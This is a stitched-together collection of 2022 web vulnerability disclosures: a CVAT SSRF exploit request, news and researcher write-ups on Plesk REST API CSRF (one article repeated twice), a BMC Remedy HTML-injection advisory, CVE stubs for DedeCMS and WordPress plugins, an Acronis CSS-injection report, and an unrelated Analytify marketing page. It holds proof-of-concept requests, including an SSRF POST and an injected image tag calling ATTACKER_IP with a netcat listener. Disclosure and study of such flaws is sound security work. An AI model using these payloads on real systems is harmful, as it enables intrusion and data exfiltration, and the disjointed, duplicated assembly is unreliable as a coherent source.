CVAT version 2.0 suffers from a server-side request forgery vulnerability.

    #Exploit Title: CVAT 2.0 - SSRF (Server Side Request Forgery)#Exploit Author: Emir Polat#Vendor Homepage: https://github.com/opencv/cvat#Version: < 2.0.0#Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)#CVE: CVE-2022-31188# Description:#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. #Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade.POST /api/v1/tasks/2/data HTTP/1.1Host: localhost:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0Accept: application/json, text/plain, */*Accept-Language:en-US,en;q=0.5Accept-Encoding: gzip, deflateAuthorization: Token 06d88f739a10c7533991d8010761df721b790b7X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGVContent-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436Content-Length: 569Origin: http://localhost:8080Connection: closeReferer:http://localhost:8080/tasks/createCookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dnedSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------251652214142138553464236533436Content-Disposition: form-data; name="remote files[0]"http://localhost:8081-----------------------------251652214142138553464236533436Content-Disposition: form-data; name=" image quality"170-----------------------------251652214142138553464236533436Content-Disposition: form-data; name="use zip chunks"true-----------------------------251652214142138553464236533436Content-Disposition: form-data; name="use cache"true-----------------------------251652214142138553464236533436--

CVAT 2.0 Server-Side Request Forgery

Bugs in programming interfaces of web hosting admin tool patched

Bugs in programming interfaces of web hosting admin tool patched

The REST API of Plesk was vulnerable to client-side request forgery (CSRF), which could lead to multiple potential attacks, including malicious file upload and the takeover of the server.

Plesk is a very popular administration tool for web hosting and data center providers. Users usually use its web interface to administer their websites and file servers. This interface has been exhaustively tested and patched against security holes.

However, according to the findings of Adrian Tiron, a security researcher at Fortbridge, the REST API that allows third-party programs access to Plesk’s functionality was not as sturdy as its web user interface counterpart.

**Client-side request forgery**

While investigating Plesk during a project for one of his clients, Tiron discovered that when the REST API is called from the browser of a logged-in administrator, there are no defences against CSRF. This shortcoming meant that if an attacker lures the Plesk admin to visit a malicious page, they could stage cookieless CSRF attacks against the server.

Catch up with the latest security research news and analysis

Several API endpoints could be attacked through the cookieless CSRF exploit. The most interesting, said Tiron, was an endpoint that supported different commands, including changing the administrator’s password. Using this endpoint, the researcher was able to hijack the admin user account and gain full control of the host.

“Admin access in Plesk is very powerful. It’s identical to having root \[access\] because Plesk is used to fully manage hosts via the web interface,” Tiron told The Daily Swig.

**Other minor bugs**

Other endpoints could be exploited through other CSRF attacks, including exploits that allowed the creation of MySQL and FTP users on the Plesk server.

Since the MySQL port is blocked externally by default, adding a database user would have a limited impact.

“However, if \[MySQL\] is misconfigured, it can give RCE \[remote code execution\] on the server as a limited user – we estimate this would be a rare scenario,” Tiron said.

The FTP user would give the attacker “RCE as a limited user (at least) because the attacker can upload a web shell,” he added.

**What went wrong?**

Plesk’s web interface uses the Authorization header, which prevents unauthenticated access to the pages of the administration tool. Once a user enters their credentials, the browser automatically adds appropriate headers to the requests, enabling the server to distinguish authenticated users.

Authorization headers also prevented random unauthenticated access to the REST API endpoints. But all this can potentially be circumvented through HTML-based CSRF attacks.

“The developers probably thought that they’re protected against the CSRF because they’re using the Authorization header,” Tiron said. “While this is true for requests created with XHR (the attacker would need to know this header to add it to the request), this is not true if you're using HTML forms – in this case, the browser attaches the Authorization header automatically, by design.”

Plesk has patched the bug. According to the company, 98.4% of Plesk servers have been automatically updated and were therefore not impacted.

Tiron recommended that developers make sure that all POST requests that change the server state implement CSRF mitigation using either the synchronizer token pattern or the double submit cookie pattern. “Based on our experience we recommend the first,” Tiron concluded.

RELATED Prototype pollution bug exposed Ember.js applications to XSS

CSRF in Plesk API enabled server takeover

Ben Dickson 11 November 2022 at 11:31 UTC

Bugs in programming interfaces of web hosting admin tool patched

The REST API of Plesk was vulnerable to client-side request forgery (CSRF), which could lead to multiple potential attacks, including malicious file upload and privilege escalation.

Plesk is a very popular administration tool for web hosting and data center providers. Users usually use its web interface to administer their websites and file servers. This interface has been exhaustively tested and patched against security holes.

However, according to the findings of Adrian Tiron, a security researcher at Fortbridge, the REST API that allows third-party programs access to Plesk’s functionality was not as sturdy as its web user interface counterpart.

**Client-side request forgery**

While investigating Plesk during a project for one of his clients, Tiron discovered that when the REST API is called from the browser of a logged-in administrator, there are no defences against CSRF. This shortcoming meant that if an attacker lures the Plesk admin to visit a malicious page, they could stage cookieless CSRF attacks against the server.

Catch up with the latest security research news and analysis

Several API endpoints could be attacked through the cookieless CSRF exploit. The most interesting, said Tiron, was an endpoint that supported different commands, including changing the administrator’s password. Using this endpoint, the researcher was able to hijack the admin user account and gain full control of the host.

“Admin access in Plesk is very powerful. It’s identical to having root \[access\] because Plesk is used to fully manage hosts via the web interface,” Tiron told The Daily Swig.

**Other minor bugs**

Other endpoints could be exploited through other CSRF attacks, including exploits that allowed the creation of MySQL and FTP users on the Plesk server.

Since the MySQL port is blocked externally by default, adding a database user would have a limited impact.

“However, if \[MySQL\] is misconfigured, it can give RCE \[remote code execution\] on the server as a limited user – we estimate this would be a rare scenario,” Tiron said.

The FTP user would give the attacker “RCE as a limited user (at least) because the attacker can upload a web shell,” he added.

**What went wrong?**

Plesk’s web interface uses the Authorization header, which prevents unauthenticated access to the pages of the administration tool. Once a user enters their credentials, the browser automatically adds appropriate headers to the requests, enabling the server to distinguish authenticated users.

Authorization headers also prevented random unauthenticated access to the REST API endpoints. But all this can potentially be circumvented through HTML-based CSRF attacks.

“The developers probably thought that they’re protected against the CSRF because they’re using the Authorization header,” Tiron said. “While this is true for requests created with XHR (the attacker would need to know this header to add it to the request), this is not true if you're using HTML forms – in this case, the browser attaches the Authorization header automatically, by design.”

Plesk has patched the bug. According to the company, 98.4% of Plesk servers have been automatically updated and were therefore not impacted.

Tiron recommended that developers make sure that all POST requests that change the server state implement CSRF mitigation using either the synchronizer token pattern or the double submit cookie pattern. “Based on our experience we recommend the first,” Tiron concluded.

RELATED Prototype pollution bug exposed Ember.js applications to XSS

CSRF in Plesk API enabled privilege escalation

An issue was discovered in BMC Remedy before 22.1. Email-based Incident Forwarding allows remote authenticated users to inject HTML (such as an SSRF payload) into the Activity Log by placing it in the To: field. This affects rendering that occurs upon a click in the "number of recipients" field. NOTE: the vendor's position is that "no real impact is demonstrated."

The application BMC Remedy allows users to forward incidents via mail from the web interface. It is possible to inject HTML into the "To" field of the mail editor. Afterwards the application shows in the activity log that the incident was forwarded to <X> recipients. By clicking on the number of recipients the injected HTML is loaded and executed.

**Vendor description**

_"Remedy IT Service Management Suite (Remedy ITSM Suite) and BMC Helix ITSM service provide out of-the-box IT Information Library (ITIL) service support functionality. Remedy ITSM Suite and BMC Helix ITSM service streamline and automate the processes around IT service desk, asset management, and change management operations. It also enables you to link your business services to your IT infrastructure to help you manage the impact of technology changes on business and business changes on technology — in real time and into the future. In addition, you can understand and optimize the user experience, balance current and future infrastructure investments, and view potential impact on the business by using a real-time service model."_

Source: https://docs.bmc.com/docs/itsm91/home-608490971.html

**Business recommendation**

The vendor provides an updated version which should be installed immediately.

The vendor states that:

1.  We have done hardening in version 22.1.
2.  However, we do not agree with assigning the CVE to this vulnerability.
3.  As mentioned previously this is an informative vulnerability, and no real impact is demonstrated.

Nevertheless, this can be used to trigger actions on internal services via CSRF or exfiltrate information.

**Vulnerability overview/description****1) HTML Injection (CVE-2022-26088)**

An authenticated attacker who can forward incidents per email is able to inject a limited set of HTML tags. This is accomplished by inserting arbitrary content into the "To:" field of the email. There is a filtering mechanism that prevents the injection of many HTML tags, for example <script>, and it also removes event handlers. An attacker is able to insert an image tag with an arbitrary src URL.

After sending the email, an entry is appended into the activity log of the incident which states that $USER has sent an email to <X> recipients. Upon clicking on the number <X>, the injected HTML code is loaded and executed.

By inserting an <img> with an arbitrary "src" attribute, an attacker can force the user's browser to make requests to his specified URL. This can be used to trigger actions on internal services via CSRF or exfiltrate information.

**Proof of concept****1) HTML Injection (CVE-2022-26088)**

When an incident is viewed, there is a button which allows forwarding the incident by mail. After entering a TO address and the body of the email, it can be sent by clicking on the send button.

The HTML injection can be performed by intercepting this request and changing the 'Email.To.InternetEmail' parameter. The modified request is:

    PUT /rest/incident/worknote/SOME_INCIDENT_ID HTTP/1.1
    Host: TARGET
    Cookie: […]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    X-Xsrf-Token: SOME_TOKEN
    Content-Length: ADAPT_AS_NEEDED
    Te: trailers
    Connection: close
    
    {
      "worknote": "pentest",
      "access": true,
      "Email.From.Person": {
        "email": "SOME_SENDING_MAIL",
        "fullName": "Pentest - SEC Consult",
        "loginId": "USERNAME"
      },
      "Email.Subject": "SOME_SUBJECT",
      "Email.Body": "test2",
      "Email.To.InternetEmail": "<img src=http: //ATTACKER_IP:8001/>a@example.test",
      "workInfoType": 16000
    }

The parameter Email.To.InternetEmail contains the payload. In this case an image tag containing the IP of the attacker was inserted:

    "<img src=http: //LOCAL_IP:8001/>a@example.test"

The a@example.test is needed to pass the email validation step and example.test was used to prevent sending out real emails. After this step, the information that $USER has sent an email to 1 recipient will be appended in the activity log of this incident.

Now we start a local netcat listener with the command:

    $ nc -vnlp 8001

Now we click on the number '1' in the activity log and see that the browser issues a request to our 'netcat' instance. This confirms that the browser tries to load the image from the specified URL.

**Vulnerable / tested versions**

The following version has been tested:

*   9.1.10 this corresponds to version 20.02 as stated at the following URL https://community.bmc.com/s/news/aA33n000000CmmSCAS/remedy-version-mapping 

**Vendor contact timeline**

**Solution**

Upgrade to version 22.1 or later which can be downloaded at the vendor's page:

https://www.bmc.com/support/resources/product-downloads.html

**Workaround**

None

**Advisory URL**

https://sec-consult.com/vulnerability-lab/

EOF Daniel Hirschberger / @2022

_Interested to work with the experts of SEC Consult? Send us your application_

_Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices_

CVE-2022-26088: HTML Injection in BMC Remedy ITSM-Suite

Plesk Obsidian allows a CSRF attack, e.g., via the /api/v2/cli/commands REST API to change an Admin password. NOTE: Obsidian is a specific version of the Plesk product: version numbers were used through version 12, and then the convention was changed so that versions are identified by names ("Obsidian"), not numbers.

Plesk Dashboard

**INTRO**

Plesk is a commercial web hosting and server data center automation software developed for Linux and Windows-based retail hosting service providers. It’s the main choice of web hosting providers these days being used by 86.7% of the websites that use a web panel for administration. This is 4.4% of all websites and there around 2M Plesk installations in the US alone. As expected there are many interesting features to attack as an administrator, however we couldn’t find anything really exploitable and also it isn’t that interesting to begin with, if you’re already an administrator, right? We tried to see if we can escalate our privileges from one of the limited roles, but these seem solid. In the end we discovered a cookieless CSRF, which is basically a design issue in this case, because it affects all the POST requests and we could abuse most of the APIs with it.

Generally speaking, it’s obvious that Plesk has been through quite a few pentests and overall has a good security posture. The last thing we wanted to focus our attention on was the REST API. We were wondering, has the REST API the same level of security as the other Plesk components? Also we need to mention that the source code Plesk is highly obfuscated with a custom PHP extension.

**Misconfigured CORS policy**

While reviewing the REST API, we quickly noticed that there was a completely open CORS policy:

Using a wildcard to allow everything

So, we thought, wow this is definitely a good sign and we were on the right track testing the REST API. This will basically allow us to send any request with any methods/headers from any origin and read the response back. Or so we thought.

**Cookieless CSRF #1 – add secret token**

The administrator can call the REST APIs from the browser and there’s no CSRF protection either (partially correct as you will see next). Let’s try to CSRF an Administrator then. But what API endpoint shall we target? After reviewing the REST API, we discovered that there is the /api/v2/auth/keys endpoint which we thought of abusing by adding a secret key to give us admin access.

API endpoint to add a secret key for Administrator

This key will allow us to authenticate and call any endpoints after that, no more CSRF needed 🙂 Perform CSRF once, add a backdoor token and get full access forever. Sweet, let’s try this.

CSRF first attempt failed

We have used Burp’s CSRF POC generator and it seems that the request fails due to “=” added at the end, the server can’t parse this JSON. This was no big issue, this old dog knows some old tricks and by reformatting our payload a bit we were able to generate a valid JSON.

Name field of the input will hold most of the JSON field

The input’s name is html encoded and basically decodes to the following. The input’s value field will hold ‘test”}’ so that when it’s concatenated with the name it will result in a valid JSON payload. Nothing new here.

Name field html decoded

Now we were able to create a valid CSRF payload and generate a secret key as you can see bellow. We also have a miconsfigured CORS policy, so we can steal it, right?

CSRF attack on the Administrator

Well, not really. What we’ve missed initially is that the Authorization header gets added automatically by the browser when using an html form to perform the CSRF attack using the POST method. However, when using the javascript XHR object to create the same request and get the token from the response, the Authorization header isn’t added anymore. Bummer, our CSRF fails in this case as we can’t read the key! But wait, there’s still some hope left. Maybe we can find some other REST endpoints where we can trigger a CSRF attack using HTML forms (POST based) that will be impactful enough to give an attacker what they need without reading the response. And we sure found quite a few of these endpoints that we’ve exploited with various degree of severity as you’ll see next.

**Cookieless CSRF #2 – add DB user**

We found a REST endpoint that allows us to add a db user which can connect from ANY remote host to ANY database.

Add DB user (CSRF-able)

Result looks like bellow:

DB user added

We thought of injecting an UDF for a quick RCE, however the mysql port is not accessible. Lesson learned, check the port first.

Mysql port filtered

**Cookieless CSRF #3 – add FTP user**

We managed to add a new FTP user with access to any existing domain we wanted.

Add FTP user (CSRF-able)

This actually worked, you can connect via FTP, inspect the client’s home dir and conduct further attacks from there.

FTP connect OK

**Cookieless CSRF #3 – add a malicious Plesk extension**

We didn’t know what Plesk extensions were initially, so we did some quick research, backdoored an existing one and added it via CSRF upload using the REST API

Plesk malicious extension added via CSRF in the REST API

The problem was that you still need to authenticate in Plesk to access the backdoored extension. Certainly there must be an easier way, right?

**Cookieless CSRF #4 – compromise the admin**

Plesk implements some custom commands internally (a “command” is an abrastraction layer if you will in the code which calls various cli tools to do the heavy lifting) in order to manage the server as you can see bellow. One of these, is the “admin” command that allows you to do multiple things, including changing the Administrator’s password.

Plesk custom commands callable via REST API

And that is exactly what we needed. We ended up compromising Plesk via its REST API (CSRF) and change the Admin’s password. Game over!

CSRF-ing the Administrator to change his password.

The documentation around this feature isn’t great so it took a while to figure out the above payload. All POST requests can be CSRF-ed , because the browser adds the Authorization header automatically when using html forms. We noticed that there is a common misconception that an application using the Authorization header is protected against CSRF. As long as you don’t have to read the response back using javascript everything just works.

**Timeline**

10/05/22 FORTBRIDGE reaches out to PLESK for vuln disclosure

11/05/22 Plesk confirms receipt and starts investigation

19/05/22 Plesk confirms the vulnerability and starts working on a fix, no ETA offered

03/06/22 Plesk fixes the issue, but requests _delaying_ the disclosure, FORTBRIDGE accepts

25/07/22 FORTBRIDGE requests update on the patching progress

27/07/22 Plesk requests _delaying_ the disclosure again, FORTBRIDGE accepts

03/08/22 Plesk estimates “no longer than 2 weeks” for disclosure

16/09/22 FORTBRIDGE requests update

16/09/22 Plesk requests _delaying_ the disclosure, FORTBRIDGE agrees to delay 2 months max

08/11/22 FORTBRIDGE releases blogpost with technical details of the Plesk Admin takeover issue

**References**

RCE & Privesc in cPanel/WHM

Mass account takeover in Yunmai smartscale by abusing the REST API

CSRF POCs sent to Plesk

**About Post Author**

CVE-2022-45130: Compromising Plesk via its REST API

DedeCMS v6.1.9 was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily add Administrator accounts and modify Admin passwords.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2022-43031: GitHub - cai-niao98/Dedecmsv6: Dedecmsv6

Cross-Site Request Forgery (CSRF) vulnerability in Advanced Dynamic Pricing for WooCommerce plugin <= 4.1.5 on WordPress leading to rule type migration.

 Verified

 Fixed

**5.4**

CVSS 3.1 score Medium severity

Report  

Monitoring Not reported to be exploited

Vulnerable versions

<= 4.1.5

PSID 

13403873238a

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Publicly disclosed

2022-10-30

**Details**

Cross-Site Request Forgery (CSRF) vulnerability leading to Rule Type Migration discovered by Muhammad Daffa (Patchstack Alliance) in WordPress Advanced Dynamic Pricing for WooCommerce plugin (versions <= 4.1.5).

**Solution**

Update the WordPress Advanced Dynamic Pricing for WooCommerce plugin to the latest available version (at least 4.1.6).

**References**

CVE-2022-43488: WordPress Advanced Dynamic Pricing for WooCommerce plugin <= 4.1.5 - Cross-Site Request Forgery (CSRF) vulnerability - Patchstack

CSRF attacks could be triggered to access and exfiltrate information

CSRF attacks could be triggered to access and exfiltrate information

A security researcher has disclosed a CSS injection flaw in Acronis software which could be abused for data theft.

On November 4, ‘Medi’ (under the alias ‘mr-medi’), published a technical analysis of the vulnerability, a client-side path traversal attack they described as the “favorite bug” they’ve ever found.

The vulnerability existed in the Acronis cloud management console. The software manages Acronis services, including cloud backups and resource monitoring.

**Path traversal**

According to the researcher, a web-facing URL would automatically pull a parameter called . Then, when the request is underway, a CSS file is also requested and loaded.

However, when this CSS file is asked for, the front-end code doesn’t sanitize the values, so it is possible for an attacker to perform a path traversal by requesting the same file from a different path.

This relative path overwrite isn’t intrinsically an important bug unless you combine it with an open redirect, which allows attackers to issue a request and force a redirect to an external domain where a malicious CSS file is stored.

Catch up on the latest web security research

Medi discovered a vulnerable API endpoint and Location HTTP header combination in which the user can control the parameter. This allowed the researcher to create an exploit with the color\_scheme parameter and a redirect, pointing to the domain so user information could be exfiltrated “by using CSS properties”.

Information could include cross-site request forgery (CSRF) tokens, personal data, partner hashes, and other data located in the Document Object Model (DOM) where the crafted CSS file is injected.

“If we specify our CSS file in a domain hosted by us, we can perform the CSRF attack via requests by loading an external image using CSS properties like , or exfiltrate user information like \[an\] IP, Referer header or User Agent,” the researcher explained. “I used my local server but you can check it out in any external domain you own.”

**Chain reaction**

A video-based Proof-of-Concept (PoC) attack has been published. Medi has also suggested that this technique could be chained with relative path overwrites and path-relative stylesheet import (PRSSI) vulnerabilities.

Medi told The Daily Swig: “Since this is an attack relying on the client side, the main risk is \[being able to\] exfiltrate information found in the vulnerable page and CSRF attacks. The type of bug depends on how the JavaScript handles the user input and the purpose of that parameter.

“For example, in Acronis, the vulnerable page was the admin dashboard containing valuable information about their customers \[and\] the parameter was used to dynamically apply styles \[...\] Other scenarios may involve leading to XSS with more serious issues like CSRF with any HTTP method.”

Medi’s findings were disclosed privately via the HackerOne platform and the flaw was patched on January 13. A $250 bug bounty was awarded.

Medi confirmed the bug had been resolved. On HackerOne, the Acronis team likened the security flaw to a reflected cross-site scripting (XSS) attack, which, despite the possibility of user data exfiltration when the color\_scheme is in use, accounts for the relatively low bug bounty.

The Daily Swig has reached out to Acronis for further comment and we will update this story as and when we hear back.

YOU MAY ALSO LIKE Gatsby patches SSRF, XSS bugs in Cloud Image CDN

CSS injection flaw patched in Acronis cloud management console

Cross-Site Request Forgery (CSRF) vulnerability in Analytify plugin <= 4.2.2 on WordPress.

Homepage | Documentation | Support | Demo | Premium Version

**Google Analytics Dashboard**

**Google Analytics Dashboard Plugin for WordPress** – by Analytify makes **Google Analytics** simple for everyone using WordPress. We know how important it is to keep track of website analytics.

Analytify allows you to present the statistics from Google Analytics in a beautiful and useful manner. The integration is super simple and does not require the help of a developer to set up the integration. Once you integrate Google Analytics in WordPress using Analytify, you will be able to view the dashboard both at the front end and the backend.

Unlike other WordPress analytics plugins, Analytify brings a lot of actionable data in a single view at the dashboard. The Free version will let you view statistics like Visitors, Page views, New vs Returning Visitors, Top Pages, Geographic data, and much more.

The best part about Analytify is that it lets you view page-level statistics like views, users, bounce rate, average time on the page while being logged in the Admin panel of your WordPress website.

The premium version of this WordPress plugin is built to leverage the power of website analytics to let you know how people find and use your website.

Now you can get Google Analytics Dashboard inside your WordPress Dashboard with just a few clicks. Our goal at Analytify is pretty simple, to make data Analytics fun In WordPress.

Analytify is one of the few WordPress analytics plugins, which is the Google Analytics Technology Partner. This means our plugin is carefully tested and vetted to make sure you get the kind of support you need to be successful.

**Analytify 4.0 is here! Discover Google Analytics Like Never Before! Must check those stunning Screenshots!**

**ANALYTIFY PRO VERSION:**

> This is the free version of Analytify, there is a Premium version that comes with basic plus advanced features to help you get Google Analytics in WordPress. The Pro version is more easy to install, and shows **Real-Time Stats**, **Campaign Stats**, **ShortCodes**, **Front-end Stats** and more reports in backend and front-end. Also the premium version has better ecommerce tracking (Buy Add-ons with premium), and campaigns management. Get the affordable Premium Version from analytify.io . Bundle price is also available with Addons.

**ANALYTIFY IS A MULTILINGUAL PLUGIN, AVAILABLE IN THE FOLLOWING LANGUAGES**

The plugin is fully available in French, Turkish and Hungarian languages. However Dutch, German and Russian are just about to be fully translated. We are working hard to make sure the plugin is fully available in all the mentioned languages.

*   French 100%
*   Turkish 100%
*   Hungarian 100%
*   Dutch 96%
*   German 96%
*   Russian 82%
*   Norwegian 79%
*   Spanish 50%

> 100% Multilingual, Translatable and WPML Compatible

**INSTALLATION PROCESS OF ANALYTIFY WORDPRESS ANALYTICS PLUGIN**

Connect your WordPress site with Google Analytics with 1-Click Authentication process and It add Google Analytics tracking code to your WordPress website without the help of a developer.

> It is highly recommended by Google Analytics Team to use your own Custom API keys. You need to create a Project in Google Console.  
> Here is a short Video guide to get your own ClientID, Client Secret and Redirect URL. Add these API Keys in Advanced Tab before connecting Analytify with Google Analytics.

**TOP FEATURES OF THIS GOOGLE ANALYTICS PLUGIN FOR WORDPRESS**

Enhanced eCommerce Google analytics Tracking Add-ons for WooCommerce

Ecommerce tracking is a tricky process and requires the time and help of a developer to properly set up events and tracking. Analytify allows solid integration with WooCommerce to ensure you do not miss out on important eCommerce data of your business. It allows you to track product clicks, impressions, add to cart clicks, product performance, and much more right in your WordPress dashboard. The report also generates key insights on following factors:

*   Average Order Value
*   Transaction Revenues
*   Total Transactions
*   Products removed from the cart

Enhanced eCommerce Tracking for Easy Digital Downloads

Analytify’s addon for Easy Digital Downloads, lets you track digital sales, transactions, and revenue. We have made sure to sync the addon with Google Analytics for Easy Digital Downloads so that you can keep a close eye on the entire shopping behavior funnel of your website.

Geographical Data

The geographic data in the analytics report presents a beautiful visualization with the list of every country and city bringing traffic to your website. The low to high scale on the map makes it easy to identify the top traffic countries. You can easily identify those countries by hovering the mouse over the map.

Social Media Statistics in WordPress

Social media is a powerful source of traffic, and our plugin lets you know the effectiveness of your social media efforts inside your WordPress dashboard.

Real-Time Reporting

You must have seen real-time data in Google Analytics. But that nifty feature can be shown in your WordPress dashboard by connecting your WordPress site with Analytify.

Helps with Search Engine Optimization

Analytify lets you see traffic data for individual blog posts and pages, this keeps you aware of your top-performing content and allows you to take actionable steps.

Automated Email Reports

If you are an agency, or a business owner with multiple websites then our automated email reporting will come very handy for you. You can send individual post stats directly to your client by simply clicking “Send Email” within the dashboard.

Google Analytics System Stats Report

In the Analytify plugin, users can also view System stats report that includes how many visitors are coming from which platforms which include Operating systems, Browsers, and Mobile devices statistics.

Google Analytics Report for Goals

In the Analytify dashboard, you can also view your goals report that includes Goal Completions, Goals Value, Goals Conversion rate, Page per session, and Pages. The dashboard is further extended to show traffic sources and the goal completion from those sources.

Frontend Tracking Reports ShortCodes

If you want to show your stats to your user on the frontend side of your website or any post, you can easily do that. As Analytify provides you this amazing option by using shortcodes you can integrate tracking on your post or page for your users of visitors by adding shortcodes.

**GDPR Compatible Plugins**

*   CookieYes
*   Cookie Notice & Compliance.

**OTHER FEATURES YOU CAN GET BY CONNECTING YOUR SITE WITH GOOGLE ANALYTICS PLUGIN FOR WORDPRESS**

*   List of top Referrers Browsers
*   List of top Referrers
*   Mobile device Statistics
*   See What’s happening when users come to your site (Bounce rate of top pages)
*   It can be easily customizable with CSS, you can give it any shape you want.
*   You can extend it to any level. Usage of API’s are very easy to work with.
*   General Statistics (Sessions, Users, Bounce rate, Average time on site, Average pages, Pageviews, New/Returning Visitors)
*   How people are finding you (TOP KEYWORDS)
*   \[New\] Dashboard dropdown menu now remembers your last selection of time period.

PREMIUM FEATURES

*   Campaigns Statistics
*   Events Tracking
*   Google AMP
*   Google Optimize
*   Forms Tracking
*   Custom Dimensions
*   Use ShortCodes in Widgets
*   Google Analytics Stats (Full) under the single posts,pages & Custom Post Types as a block in wp-admin
*   ShortCodes (Simple and Advanced) for Custom Statistics of your own choice

WooCommerce Enhanced eCommerce tracking and report dashboard right inside your WordPress is now available. Take a look.

Following are the important add-ons which empower you to set up Google Analytics like a boss. It really helps your clients, online stores, etc.

*   Google Analytics Goals Dashboard
*   Google Analytics eCommerce Tracking for WooCommerce
*   Google Analytics eCommerce Tracking for Easy Digital Downloads
*   Automated Email Notifications
*   Google Analytics Campaigns Tracking
*   \[Free\] Google Analytics Dashboard Widget

FOLLOWING IS A COMPLETE HIERARCHY STRUCTURE OF ANALYTIFY PRODUCTS SUITE

*   Analytify Core (Free and Required for all add-ons)
    *   Dashboard widget (Free) Google Analytics Widget in your WordPress Dashboard.
    *   Analytify Pro (Paid)
        *   Campaign Tracking (Paid)
        *   Email Notifications (Paid)
        *   Google Analytics Goals Tracking and Dashboard (Paid)
        *   Google Analytics Forms Tracking and Dashboard (Paid)
        *   Google Analytics Authors Tracking and Dashboard (Paid)
        *   Enhanced Ecommerce Google Analytics Tracking for WooCommerce (Paid)
        *   Enhanced Ecommerce Google Analytics Tracking for Easy Digital Downloads (Paid)

It is highly recommended by Google Analytics Team to use your own Custom API keys. You need to create a Project in Google Console.

Here is a short Video guide or a tutorial to get your own ClientID, Client Secret and Redirect URL. Add these API Keys in Advanced Tab before connecting Analytify with Google Analytics.

> This Google analytics plugin is also available on github and ready to take bugs and pull requests. For Support, you can buy the **PRO version**, this will give access to premium updates, support and features.

**Notes**

Analytify is the best Google Analytics plugin for WordPress. We make Google Analytics look EASY. You know all about Google Analytics and love the data it provides, but wouldn’t it be nice if there is a tool to make managing all of that complex information simpler?

You’re in luck.

Google Analytics Was Never This Fun In WordPress before.

Following is a list of Testimonials you must read them once.

Testimonial # 1

**Great way to understand your audience**

I’ve been using the Pro version for quite a while. I really love how it gives me in-depth information about each individual post. That kind of info is hard to navigate to in Google Analytics even if you’re relatively familiar with it already. I discovered all kinds of new things about how people land on my site and how they engage with it just by activating the plugin and looking at the information it provides in the Dashboard and on individual posts.

The author is also an official Google analytics Partner, which I think speaks volumes. Well done all around, highly recommended!

Testimonial # 2

**Best Google Analytics Plugin**

This is something that clients really love as they of course want to see traffic to their site. However many do not want to log into google analytics and work their way through its rather complicated reporting modules. This gives all the headline stuff and more. What’s really neat is that it does it for every single page as well. So you can really see what’s going on for a particular post. So a google search for X led to this page. It also has great realtime reporting for the paid version. I had one small issue and the developer responded and addressed it immediately. Very impressed. It’s become a default plugin.

Testimonial # 3

**Excellent Integrations with Google Analytics**

Many of my clients don’t want to view analytics outside their dashboard. This plugin integrates GA beautifully within the WordPress admin panel. I suggest you give it a spin. The developers are also very nice and dedicated to the plugin, which goes a long way.

Testimonial # 4

**Outstanding support and product**

Besides thinking the plugin is wonderful, I am equally impressed with the support team. I had issues and they emailed back and forth to resolve my issues and even update the plugin for me. I highly recommend this plugin which has been very beneficial to my analytics, but just as important, I appreciate the support in resolving my issue in a very timely manner.

You may buy the premium version to support the development.

https://analytify.io/details

CVE-2022-38137: Analytify – Google Analytics Dashboard For WordPress

Cross-Site Request Forgery (CSRF) vulnerability in CodeAndMore WP Page Widget plugin <= 3.9 on WordPress leading to plugin settings change.

 Verified

 Fixed

**5.4**

CVSS 3.1 score Medium severity

Report  

Monitoring Not reported to be exploited

Vulnerable versions

<= 3.9

PSID 

14a0f5ad99e0

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Publicly disclosed

2022-09-26

**Details**

Cross-Site Request Forgery (CSRF) vulnerability was discovered by Muhammad Daffa (Patchstack Alliance) in the WordPress WP Page Widget plugin (versions <= 3.9).

**Solution**

Update the WordPress WP Page Widget plugin to the latest available version (at least 4.0).

**References**

Tag

#csrf